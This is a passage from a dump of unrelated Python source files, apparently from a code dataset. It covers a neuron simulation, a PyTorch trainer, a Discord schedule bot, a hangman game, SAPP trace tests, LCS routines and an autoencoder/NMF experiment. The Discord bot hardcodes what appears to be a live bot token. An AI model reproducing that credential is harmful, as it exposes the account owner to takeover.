self.soma:\n seg.IA.gkAbar = 0.0165\n self.soma.insert('Ih')\n for seg in self.soma:\n seg.Ih.gkhbar = 0.0005\n self.soma.insert('Ksoma')\n for seg in self.soma:\n seg.Ksoma.gksoma = 0.0319\n self.soma.insert('Nasoma')\n for seg in self.soma:\n seg.Nasoma.gnasoma = 0.0107\n seg.Nasoma.gl = 1. / Rm\n seg.Nasoma.el = -70\n\n self.dend1.insert('IA')\n for seg in self.dend1:\n seg.IA.gkAbar = 0.004\n self.dend1.insert('Kdend')\n for seg in self.dend1:\n seg.Kdend.gkdend = 2 * 0.023\n self.dend1.insert('Nadend')\n for seg in self.dend1:\n seg.Nadend.gnadend = 2 * 0.0117\n seg.Nadend.gl = 1. / Rm\n seg.Nadend.el = -70\n\n self.dend2.insert('IA')\n for seg in self.dend2:\n seg.IA.gkAbar = 0.004\n self.dend2.insert('Kdend')\n for seg in self.dend2:\n seg.Kdend.gkdend = 2 * 0.023\n self.dend2.insert('Nadend')\n for seg in self.dend2:\n seg.Nadend.gnadend = 2 * 0.0117\n seg.Nadend.gl = 1. / Rm\n seg.Nadend.el = -70\n \n self.axon.insert('Kaxon')\n for seg in self.axon:\n seg.Kaxon.gkaxon = 0.05104\n self.axon.insert('Naaxon')\n for seg in self.axon:\n seg.Naaxon.gnaaxon = 0.01712\n seg.Naaxon.gl = 1. / Rm\n seg.Naaxon.el = -70\n\n def geom_nseg(self):\n lambda_f = h.lambda_f\n for seg in self.all:\n seg.nseg = int((seg.L/(0.1*lambda_f(100))+0.9)/2)*2+1\n\n def synapses(self):\n syn_ = h.MyExp2Syn(self.dend2(0.5))\n syn_.tau1 = 0.5\n syn_.tau2 = 3\n self.prelist.append(syn_) \n\n syn_ = h.MyExp2Syn(self.dend1(0.5))\n syn_.tau1 = 0.5\n syn_.tau2 = 3\n self.prelist.append(syn_)\n\n syn_ = h.MyExp2Syn(self.soma(0.5))\n syn_.tau1 = 1\n syn_.tau2 = 8\n syn_.e = -75\n self.prelist.append(syn_)\n\n syn_ = h.MyExp2Syn(self.soma(0.5))\n syn_.tau1 = 35\n syn_.tau2 = 100\n syn_.e = -75\n \n","sub_path":"python_port/olm_cell2.py","file_name":"olm_cell2.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438854311","text":"from __future__ import print_function\n\nimport re\nimport os\n\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms, models\nfrom torch.autograd import Variable\nfrom model import *\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch GTSRB example')\nparser.add_argument('--data', type=str, default='data', metavar='D',\n help=\"folder where data is located. train_data.zip and test_data.zip need to be found in the folder\")\nparser.add_argument('--batch-size', type=int, default=32, metavar='N',\n help='input batch size for training (default: 32)')\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\nparser.add_argument('--model_file', type=str, default=None, metavar='PU',\n help='pick up where you were (default: None)')\nparser.add_argument('--model_name', type=str, default='model', metavar='MN',\n help='name of the model file (default: model)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\n\n### Data Initialization and Loading\nfrom data import initialize_data, data_transforms # data.py in the same folder\ntrain_images, train_labels, val_images, val_labels = initialize_data(args.data) # extracts the zip files, makes a validation set\n\n\n\n\ntrain_dataset = torch.utils.data.TensorDataset(train_images, train_labels)\nval_dataset = torch.utils.data.TensorDataset(val_images, val_labels)\n\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=args.batch_size, shuffle=True, num_workers=4)\nval_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=args.batch_size, shuffle=False, num_workers=4)\n\nnet = Net()\nfirst_epcoh = 1\n\nif args.model_file and os.path.isfile(args.model_file):\n print(\"loading {}\".format(args.model_file))\n first_epcoh = int(re.findall('_(\\d+).pth', args.model_file)[0]) +1\n net.load_state_dict(torch.load(args.model_file))\n\ncuda = torch.cuda.is_available()\nif cuda:\n net = net.cuda()\n\noptimizer = optim.Adadelta(net.parameters())\n\ndef rmse_loss(input, target, size_average=True):\n loss = torch.sqrt(\n torch.mean((input - target).pow(2), 1))\n if size_average:\n return torch.mean(loss)\n else:\n return torch.sum(loss)\n\nLossFunc = rmse_loss\n\ndef train(epoch):\n net.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = Variable(data), Variable(target)\n if cuda:\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n output = net(data)\n loss = LossFunc(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n\ndef validation():\n net.eval()\n validation_loss = 0\n correct = 0\n for data, target in val_loader:\n data, target = Variable(data, volatile=True), Variable(target)\n if cuda:\n data, target = data.cuda(), target.cuda()\n output = net(data)\n lo = LossFunc(output, target, size_average=False).data[0] # sum up batch loss\n validation_loss += lo\n # print(lo)\n\n validation_loss /= len(val_loader.dataset)\n print(len(val_loader.dataset))\n print('\\nValidation set: Average loss: {:.4f}\\n'.format(validation_loss))\n return validation_loss\n\nploss = 0\npploss = 0\nval_loss = 0\nloss_min = 1000\nPreState = None\nstrict_save = args.model_file is not None\n\nfor epoch in range(first_epcoh, args.epochs + 1):\n PreState = net.state_dict()\n train(epoch)\n pploss, ploss, val_loss = ploss, val_loss, validation() \n if pploss > ploss and ploss < val_loss and (not strict_save or strict_save and ploss < loss_min):\n loss_min = ploss\n model_file = \"{}_{}.pth\".format(args.model_name, epoch-1)\n torch.save(PreState, model_file)\n print('\\nSaved model to ' + model_file + '. You can run `python evaluate.py ' + model_file + '` to generate the Kaggle formatted csv file')\n strict_save = True\n \nmodel_file = \"{}_{}.pth\".format(args.model_name, args.epochs)\ntorch.save(PreState, model_file)\n","sub_path":"GalaxyZoo-DenseNet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"483121037","text":"import tkinter\nfrom tkinter import *\n\nwindow = tkinter.Tk()\nv=\"start\"\nlbl = Label(window, text=v)\nlbl.pack()\ndef changelabel(v):\n lbl.config(text=v)\nv =\"New, dynamic text!\"\nbtn=Button(window, text=\"Change label text\", command=lambda: changelabel(v))\nbtn.pack()\n\nbtn2=Button(window, text=\"Change label text\", command=lambda: otherlabel(v))\nbtn2.pack()\n\ndef otherlabel(v):\n\tlbl2 = Label(window, text=\"TOD\")\n\tlbl2.pack()\n\nwindow.mainloop()","sub_path":"tester2.py","file_name":"tester2.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"510253553","text":"import discord\nimport time\nfrom discord.ext import commands\nimport random\nimport urllib\nimport urllib.request\nimport sys\nimport time\nimport subprocess\nfrom bs4 import BeautifulSoup\n\n\nclient = discord.Client()\n\ndescription = '''school script door Tobias Feld '''\nbot = commands.Bot(command_prefix='!', description=description)\nlink = 'http://rooster.clvleerlingen.nl/rooster.php?klas%5B%5D=a3c&type=Klasrooster&wijzigingen=1&school=448'\n\nhtml = str(urllib.request.urlopen(link).read())\n\n\nhtml1 = html[5506:-480]\nx = html1.replace(\"\\\\n\", \"\")\nz = x.replace(\"\\\\r\", \"\")\ny = z.replace(\"?\", \"\")\np = y.replace(\"ste\", \"\")\nsoup = BeautifulSoup(p, \"html.parser\")\n\nc = soup.get_text()\n\nprint(c)\n\n \n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n\"\"\" hieronder staat rooster letterlijk overkopieren \"\"\"\n\"\"\"roosterlink = http://bit.ly/2cfKjkS\"\"\"\n\nweekdag = time.strftime(\"%w\")\n@bot.command()\nasync def school():\n \"\"\"start een script voor school \"\"\"\n if weekdag == \"4\":\n await bot.say(c)\n\n\n\n@bot.command()\nasync def rooster():\n await bot.say(link)\n await bot.type()\n if weekdag == \"01\":\n await bot.say(\"Vandaag is er geen School :nerd:\")\n elif weekdag == \"6\":\n await bot.say(\"Vandaag is er geen School :nerd:\")\n else:\n with open('http://bit.ly/2cfKjkS', 'rb') as f:\n \n await bot.upload()\n\n@bot.command()\nasync def close():\n await bot.say(\"logging out!\")\n await bot.logout()\n \nbot.run('MjIwMjE3NjIxNjE2Nzg3NDU3.Cqeh-w.gR8XOZKvqxaQwYztoMBUGkZykYM')\n","sub_path":"basic_bot.py","file_name":"basic_bot.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"76212830","text":"import random\r\n\r\nlista_palavras = [\"final fantasy\",\"fortnite\",\"assassins creed\",\"infamous\",\"god of war\",\"the last of us\",\"watch dogs\",\"resident evil\",\"unravel\",\"the witcher\",\"detroit become human\",\"hitman\",\"uncharted\",\"minecraft\"]\r\n\r\ndef escolher_palavra():\r\n\r\n palavra = random.choice(lista_palavras)\r\n\r\n return palavra.upper()\r\n\r\ndef mostrar_palavra(palavra):\r\n\r\n palavra_listrada = \"_\" * len(palavra)\r\n adivinhou = False\r\n tentou_letras = []\r\n tentou_palavras = []\r\n tentativas = 6\r\n\r\n print(\"A Forca dos Jogos\")\r\n print(\"Espaço tambem é válido\")\r\n print(\"Você tem\",tentativas,\"tentativas\")\r\n print(palavra_listrada)\r\n print(\"\\n\")\r\n\r\n while not adivinhou and tentativas > 0:\r\n\r\n letra = input(\"Digite uma letra: \").upper()\r\n\r\n if len(letra) == 1 :\r\n\r\n if letra in tentou_letras:\r\n\r\n print(\"Você já digitou a letra\",letra)\r\n\r\n elif letra not in palavra:\r\n\r\n print(letra,\"não está na palavra!\")\r\n\r\n tentativas -= 1\r\n tentou_letras.append(letra)\r\n\r\n else:\r\n\r\n print(letra,\"está na palavra!\")\r\n\r\n tentou_letras.append(letra)\r\n palavra_em_lista = list(palavra_listrada)\r\n indices = [i for i, letter in enumerate(palavra) if letter == letra]\r\n\r\n for posicao in indices:\r\n\r\n palavra_em_lista[posicao] = letra\r\n palavra_listrada = \"\".join(palavra_em_lista)\r\n\r\n if \"_\"not in palavra_listrada:\r\n\r\n adivinhou = True\r\n else:\r\n\r\n print(\"Não é válido. Digite uma LETRA.\")\r\n print(\"Você tem\",tentativas,\"tentativas\")\r\n print(palavra_listrada)\r\n print(\"\\n\")\r\n\r\n if adivinhou:\r\n\r\n print(\"Voce acertou qual é o jogo!\")\r\n\r\n else:\r\n\r\n print(\"Você perdeu!\")\r\n\r\ndef iniciar_jogo():\r\n\r\n palavra = escolher_palavra()\r\n mostrar_palavra(palavra)\r\n\r\n while input(\"Jogar novamente? (S/N) \").upper() == \"S\":\r\n\r\n palavra = escolher_palavra()\r\n mostrar_palavra(palavra)\r\n\r\niniciar_jogo()\r\n","sub_path":"Forca_dos_Jogos.py","file_name":"Forca_dos_Jogos.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"245681555","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#version : 1.1\nimport time\nfrom api import *\n\n\"\"\"\ntry:\n\timport argparse\n\tflags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n\tflags = None\n\"\"\"\n\ndef main():\t\n\tstart = time.time()\n\tgs = Google_spreadsheets()\n\tprint('WORKERS - %s' %gs.workers_count)\n\tgs.service = gs.auth()\n\tgs.target_ss_id = gs.ss_ids['moya_baza']\n\tgs.target_ws_title = 'задание-паша'\n\tmatches = gs.find_matches()\n\tgs.write_to_log('Время выполнения %ss' %(time.time() - start))\n\nif __name__ == '__main__':\n main()","sub_path":"google_spreadsheets/spreadsheets/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"212990730","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport unittest\nfrom typing import Any, List\nfrom unittest import TestCase\n\nfrom ...db import DB, DBType\nfrom ...models import (\n DBID,\n SharedText,\n SharedTextKind,\n TraceFrameLeafAssoc,\n create as create_models,\n)\nfrom ...tests.fake_object_generator import FakeObjectGenerator\nfrom .. import trace as trace_module\nfrom ..trace import LeafLookup, TraceFrameQueryResult\n\n\nclass QueryTest(TestCase):\n def setUp(self) -> None:\n self.db = DB(DBType.MEMORY)\n create_models(self.db)\n self.fakes = FakeObjectGenerator()\n\n # pyre-fixme[3]: Return annotation cannot contain `Any`.\n def _basic_trace_frames(self) -> List[Any]:\n return [\n self.fakes.precondition(\n caller=\"call1\",\n caller_port=\"root\",\n callee=\"call2\",\n callee_port=\"param0\",\n location=(1, 1, 1),\n ),\n self.fakes.precondition(\n caller=\"call2\",\n caller_port=\"param0\",\n callee=\"leaf\",\n callee_port=\"sink\",\n location=(1, 2, 1),\n ),\n ]\n\n def testLeafLookup(self) -> None:\n shared_texts = [\n SharedText(id=DBID(1), contents=\"source1\", kind=SharedTextKind.SOURCE),\n SharedText(id=DBID(2), contents=\"source2\", kind=SharedTextKind.SOURCE),\n SharedText(id=DBID(3), contents=\"source3\", kind=SharedTextKind.SOURCE),\n SharedText(id=DBID(4), contents=\"sink4\", kind=SharedTextKind.SINK),\n SharedText(id=DBID(5), contents=\"sink5\", kind=SharedTextKind.SINK),\n ]\n with self.db.make_session() as session:\n for shared_text in shared_texts:\n session.add(shared_text)\n session.commit()\n\n leaf_lookup = LeafLookup.create(session)\n\n self.assertEqual(\n leaf_lookup.resolve([1, 2], SharedTextKind.SOURCE),\n {\"source1\", \"source2\"},\n )\n self.assertEqual(\n leaf_lookup.resolve([3], SharedTextKind.SOURCE),\n {\"source3\"},\n )\n self.assertEqual(\n leaf_lookup.resolve([4, 5], SharedTextKind.SINK),\n {\"sink4\", \"sink5\"},\n )\n\n def testNextTraceFrames(self) -> None:\n run = self.fakes.run()\n frames = self._basic_trace_frames()\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add(\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n )\n )\n self.fakes.save_all(self.db)\n\n with self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n next_frames = trace_module.next_frames(session, frames[0], {\"sink1\"}, set())\n self.assertEqual(len(next_frames), 1)\n self.assertEqual(int(next_frames[0].id), int(frames[1].id))\n\n def testNextTraceFramesBackwards(self) -> None:\n run = self.fakes.run()\n frames = [\n self.fakes.precondition(\n caller=\"call1\",\n caller_port=\"root\",\n callee=\"call3\",\n callee_port=\"param1\",\n location=(1, 1, 1),\n ),\n self.fakes.precondition(\n caller=\"call3\",\n caller_port=\"param1\",\n callee=\"leaf\",\n callee_port=\"sink\",\n location=(1, 2, 1),\n ),\n ]\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add_all(\n [\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[0].id, leaf_id=sink.id, trace_length=1\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n ),\n ]\n )\n self.fakes.save_all(self.db)\n\n with self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n next_frames = trace_module.next_frames(\n session, frames[1], {\"sink1\"}, set(), backwards=True\n )\n\n self.assertEqual(len(next_frames), 1)\n self.assertEqual(int(next_frames[0].id), int(frames[0].id))\n\n def testNextTraceFramesMultipleRuns(self) -> None:\n run1 = self.fakes.run()\n frames = self._basic_trace_frames()\n self.fakes.save_all(self.db)\n\n run2 = self.fakes.run()\n frames.extend(self._basic_trace_frames())\n\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add_all(\n [\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=0\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[3].id, leaf_id=sink.id, trace_length=0\n ),\n ]\n )\n self.fakes.save_all(self.db)\n\n with self.db.make_session() as session:\n session.add(run1)\n session.add(run2)\n session.commit()\n\n next_frames = trace_module.next_frames(session, frames[2], {\"sink1\"}, set())\n self.assertEqual(len(next_frames), 1)\n self.assertEqual(int(next_frames[0].id), int(frames[3].id))\n\n @unittest.skip(\"T71492980\")\n def testNavigateTraceFrames(self) -> None:\n run = self.fakes.run()\n frames = self._basic_trace_frames()\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add(\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n )\n )\n self.fakes.save_all(self.db)\n with self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n result = trace_module.navigate_trace_frames(\n session,\n [TraceFrameQueryResult.from_record(frames[0])],\n set(),\n {\"sink1\"},\n )\n self.assertEqual(len(result), 2)\n self.assertEqual(int(result[0][0].id), int(frames[0].id))\n self.assertEqual(int(result[1][0].id), int(frames[1].id))\n\n @unittest.skip(\"T71492980\")\n def testNavigateTraceFramesDetectsCycle(self) -> None:\n \"\"\"This test checks that we don't get stuck in a cycle. Without cycle\n detection code, this test will go from 1->2->1->2->... . With cycle\n detection code it goes 1->2->3->4.\n \"\"\"\n run = self.fakes.run()\n frames = [\n self.fakes.precondition(\n caller=\"call1\",\n caller_port=\"param1\",\n callee=\"call2\",\n callee_port=\"param2\",\n ),\n self.fakes.precondition(\n caller=\"call2\",\n caller_port=\"param2\",\n callee=\"call1\",\n callee_port=\"param1\",\n ),\n self.fakes.precondition(\n caller=\"call1\",\n caller_port=\"param1\",\n callee=\"call3\",\n callee_port=\"param3\",\n ),\n self.fakes.precondition(\n caller=\"call3\", caller_port=\"param3\", callee=\"leaf\", callee_port=\"sink\"\n ),\n ]\n sink = self.fakes.sink(\"sink\")\n self.fakes.saver.add_all(\n [\n # This trace_length 0 is part of a bug.\n # See models.py:TraceFrameLeafAssoc.trace_length\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[0].id, leaf_id=sink.id, trace_length=0\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[2].id, leaf_id=sink.id, trace_length=1\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[3].id, leaf_id=sink.id, trace_length=0\n ),\n ]\n )\n\n self.fakes.save_all(self.db)\n\n with self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n result = trace_module.navigate_trace_frames(\n session,\n [TraceFrameQueryResult.from_record(frames[0])],\n set(),\n {\"sink\"},\n )\n self.assertEqual(len(frames), 4)\n self.assertNotEqual(\n [int(frame.id) for frame, _branches in result],\n [int(frame.id) for frame in frames],\n )\n","sub_path":"sapp/ui/tests/trace_test.py","file_name":"trace_test.py","file_ext":"py","file_size_in_byte":8906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"187612058","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /mnt/projects/django-init/django_init/db/postgresql.py\n# Compiled at: 2020-01-15 01:24:21\n# Size of source mod 2**32: 920 bytes\nimport psycopg2\nfrom django_init.db.base import DatabaseBase\n\nclass DatabasePostgreSQL(DatabaseBase):\n client = psycopg2\n sql_show_dbs = 'SELECT * FROM pg_database'\n sql_create_db = 'CREATE DATABASE %s WITH OWNER = %s'\n\n def connect(self):\n try:\n self.conn = (self.client.connect)(**self.config)\n self.conn.autocommit = True\n self.cursor = self.conn.cursor()\n except Exception as e:\n try:\n print(e)\n finally:\n e = None\n del e\n\n else:\n print(self.msg_connect)\n\n def create_db(self, db_name):\n user = self.config.get('user')\n sql = self.sql_create_db % (db_name, user)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n try:\n print(e)\n finally:\n e = None\n del e\n\n else:\n print(self.msg_create_db % db_name)","sub_path":"pycfiles/django-init-0.0.1.7.tar/postgresql.cpython-37.py","file_name":"postgresql.cpython-37.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"546360126","text":"\ndef lcs(s1,s2):\n \n index= -1\n index2= -1\n if len(s1) == 1:\n index=0\n if len(s2) == 1:\n index2=0\n if len(s1)==0 or len(s2) ==0: \n return 0\n if s1[index] == s2[index2]:\n return 1 +lcs(s1[0:len(s1)-1],s2[0:len(s2)-1])\n else:\n return max(lcs(s1[0:len(s1)-1],s2[0:len(s2)]) , lcs(s1[0:len(s1)],s2[0:len(s2)-1]) )\n\n#######################################################Dynamic Soln########################################################\ndef lcsDp(s1,s2,string):\n n,m=len(s1),len(s2)\n dp_t=[[0]*(n+1) for _ in range(m+1)]\n \n for i in range(m):\n for j in range(n):\n \n if s1[j] == s2[i]:\n dp_t[i+1][j+1]=1+dp_t[i][j]\n \n else:\n dp_t[i+1][j+1]=max(dp_t[i+1][j],dp_t[i][j+1])\n \n return dp_t \n\n \n \n######################################################Dynamic Soln########################################################\n# Dynamic programming implementation of LCS problem\n\n# Returns length of LCS for X[0..m-1], Y[0..n-1]\ndef lcs(X, Y, m, n):\n\tL = [[0 for x in range(n+1)] for x in range(m+1)]\n\n\t# Following steps build L[m+1][n+1] in bottom up fashion. Note\n\t# that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1]\n\tfor i in range(m+1):\n\t\tfor j in range(n+1):\n\t\t\tif i == 0 or j == 0:\n\t\t\t\tL[i][j] = 0\n\t\t\telif X[i-1] == Y[j-1]:\n\t\t\t\tL[i][j] = L[i-1][j-1] + 1\n\t\t\telse:\n\t\t\t\tL[i][j] = max(L[i-1][j], L[i][j-1])\n\n\t# Following code is used to print LCS\n\tindex = L[m][n]\n\n\t# Create a character array to store the lcs string\n\tlcs = [\"\"] * (index+1)\n\tlcs[index] = \"\"\n\n\t# Start from the right-most-bottom-most corner and\n\t# one by one store characters in lcs[]\n\ti = m\n\tj = n\n\twhile i > 0 and j > 0:\n\n\t\t# If current character in X[] and Y are same, then\n\t\t# current character is part of LCS\n\t\tif X[i-1] == Y[j-1]:\n\t\t\tlcs[index-1] = X[i-1]\n\t\t\tprint (\"\".join(lcs))\n\t\t\ti-=1\n\t\t\tj-=1\n\t\t\tindex-=1\n\n\t\t# If not same, then find the larger of two and\n\t\t# go in the direction of larger value\n\t\telif L[i-1][j] > L[i][j-1]:\n\t\t\ti-=1\n\t\telse:\n\t\t\tj-=1\n\n\tprint (\"\".join(lcs))\n\n# Driver program\nX = \"AJKEQSLOBSROFGZ \"\nY = \"OVGURWZLWVLUXTH \"\nm = len(X)\nn = len(Y)\nlcs(X, Y, m, n)\n\n# This code is contributed by BHAVYA JAIN\n","sub_path":"Dynamic programming/Lcs.py","file_name":"Lcs.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"153835348","text":"'''\nThis code investigate the use of Autoencoders to improve nmf results.\nAutoencoders is build to reduce inputs dimensionality that will be applied into a nmf model.\nAfter that, W and H will be used to source separetion using Wi and Hi in order to disaggregate power consuption appliance.\nThe core idea is with Wi and Hi obtained from encoded space, we can reconstruct Pi in decoded space using decoder part from Autoencoder learnt.\nAuthor: Wesin Alves\nData: 2017-12-22\n'''\nfrom sklearn.decomposition import NMF\nfrom sklearn.decomposition.nmf import _beta_divergence \nimport numpy as np\nfrom numpy import linalg as la\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import normalize\nimport time\nstart_time = time.time()\nimport sklearn.decomposition as decomp\nfrom keras.layers import Input, Dense, Conv1D, MaxPooling1D, UpSampling1D\nfrom keras.models import Model\n\n\n###########\n# load data\n###########\n\nwith open('../dataset/train_signal92.csv', 'rb') as f:\n\ttrain_signal = np.loadtxt(f, delimiter='\\t')\n\tf.close()\n\nwith open('../dataset/test_signalplus92.csv', 'rb') as f:\n\ttest_signalplus = np.loadtxt(f, delimiter='\\t')\n\tf.close()\n\nn_day = 92\nn_sample = 1440\nattribute = 5 # power\n\ntrain_signal = train_signal.reshape(train_signal.shape[0],1,n_day)\ntest_signalplus=test_signalplus.reshape(test_signalplus.shape[0],1,n_day)\n\nprint('**** shape of aggregate and test signal ****')\nprint(train_signal.shape)\nprint(test_signalplus.shape)\n\n#############################\n# Disaggregate error\n# sum(l2_norm(Xi-Xi')**2 / 2)\n#############################\n\ndef disag_error(X,W,H):\n\terror = (la.norm((X-W.dot(H)),2)**2)/2\n\treturn error\n\n##################################\n# build standart autoencoder model\n##################################\n\n#this is a size of encoded representation\nencoding_dim = 16\ninput_dim = n_day\n\n#this is our input placeholder\ninput_ = Input(shape=(1,input_dim))\n#encoded is a encoded representation of the input\nx = Conv1D(64, 3, activation='relu', padding='same')(input_)\nx = MaxPooling1D(2, padding='same')(x)\nx = Conv1D(encoding_dim, 3, activation='relu', padding='same')(x)\nencoded = MaxPooling1D(2, padding='same')(x)\n\n#decoded is the lossy reconstruction of the input\nx = Conv1D(16, 3, activation='relu', padding='same')(encoded)\nx = UpSampling1D(1)(x)\nx = Conv1D(32,3, activation='relu', padding='same')(x)\nx = UpSampling1D(1)(x)\ndecoded = Conv1D(input_dim,3, activation='sigmoid', padding='same')(x)\n\n# this model maps an input to its reconstruction\nconv_autoencoder = Model(input_, decoded)\n\n\n#train the conv_autoencoder\nconv_autoencoder.compile(optimizer='adam', \n\t\t\t\t\t\tloss='mean_squared_error',\n\t\t\t\t\t\tmetrics=['accuracy'])\n\nconv_autoencoder.summary()\n\n#this model maps an input to its encoded representation - outputs 32 dmin\nencoder = Model(input_, encoded)\n\n#create a placeholder for a encoded (32-dimension) input\nencoded_input = Input(shape=(1,encoding_dim))\n#retrieve the last layer of the conv_autoencoder model - output 64 dim, after 128, after 784\ndecoder_layer1 = conv_autoencoder.layers[-5]\ndecoder_layer2 = conv_autoencoder.layers[-4]\ndecoder_layer3 = conv_autoencoder.layers[-3]\ndecoder_layer4 = conv_autoencoder.layers[-2]\ndecoder_layer5 = conv_autoencoder.layers[-1]\n\ndecoder_layer = decoder_layer5(decoder_layer4(\n\t\t\t\t\tdecoder_layer3(decoder_layer2(\n\t\t\t\t\t\tdecoder_layer1(encoded_input)))))\n\n#create the decoder model\ndecoder = Model(encoded_input, decoder_layer)\n\n###################\n# train autoencoder\n###################\n\n\nconv_autoencoder.fit(train_signal,train_signal,epochs=50,\n\tbatch_size=128,\n\tshuffle=True,\n\tvalidation_data=(test_signalplus,test_signalplus))\n\n######################\n# evaluate autoencoder\n######################\n\nscore = conv_autoencoder.evaluate(test_signalplus, test_signalplus, verbose=0)\nprint('*'*5,'evaluate conv_autoencoder','*'*5)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n'''\n################\n# encoder inputs\n################\n\ntest_encoded = encoder.predict(test_signal)\ntrain_encoded = encoder.predict(aggregate_signal)\n\n\n################\n# buid nmf model\n################\n\nalpha = 0.012\nmodel = NMF(n_components = encoding_dim, init = 'random', max_iter=500, solver='cd')\n\n#################\n# train nmf model\n#################\nprint('*'*5,'evaluate NMF','*'*5)\nW = model.fit_transform(train_encoded)\ntrain_error = disag_error(train_encoded,W,model.components_)\nprint('train error: ', train_error)\n\n####################\n# evaluate nmf model\n####################\nW_test = model.transform(test_encoded)\ntest_error = disag_error(test_encoded,W_test,model.components_)\nprint('Test error: ', test_error)\n\n#################\n# decoder outputs\n#################\n\ndecoded_signal = decoder.predict(W.dot(model.components_))\n\n##############\n# get accuracy\n##############\n\nprint('*'*5,'evaluate nmf conv_autoencoder','*'*5)\nscore = conv_autoencoder.evaluate(decoded_signal, test_signal, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n'''","sub_path":"ae_nmf2.py","file_name":"ae_nmf2.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"401019954","text":"\"\"\"\nSubmodule for generating streamlines from rasters.\n\"\"\"\n\nfrom math import ceil, sqrt\n\ndef interpolate1(x, y, a, b, c, d):\n \"\"\" Return a value *v(x,y)* in the regular structured stencil\n\n a --- b\n | v |\n c --- d\n\n using linear interpolation. The coordinates (x, y) must be normalized by\n the horizontal and vertical grid spacings, respectively.\n \"\"\"\n left = (c-a)*y + a\n right = (d-b)*y + b\n return (right - left) * x + left\n\n\ndef streamline2d(U, V, x0, y0, ds=0.5, max_nodes=5000, res=(1.0, 1.0),\n tol=None, momentum=False):\n \"\"\" Integrate velocity field (*U*, *V*) using a 4th-order Runge-Kutta\n scheme, starting from *x0*, *y0*. A pair of lists with coordinates\n in X and Y is returned.\n\n *ds* is the step size\n\n *max_nodes* is the maximum number of steps to take. Iteration will be\n terminated automatically if the streamline reaches the edge of the vector\n field.\n\n *res* is the resolution of 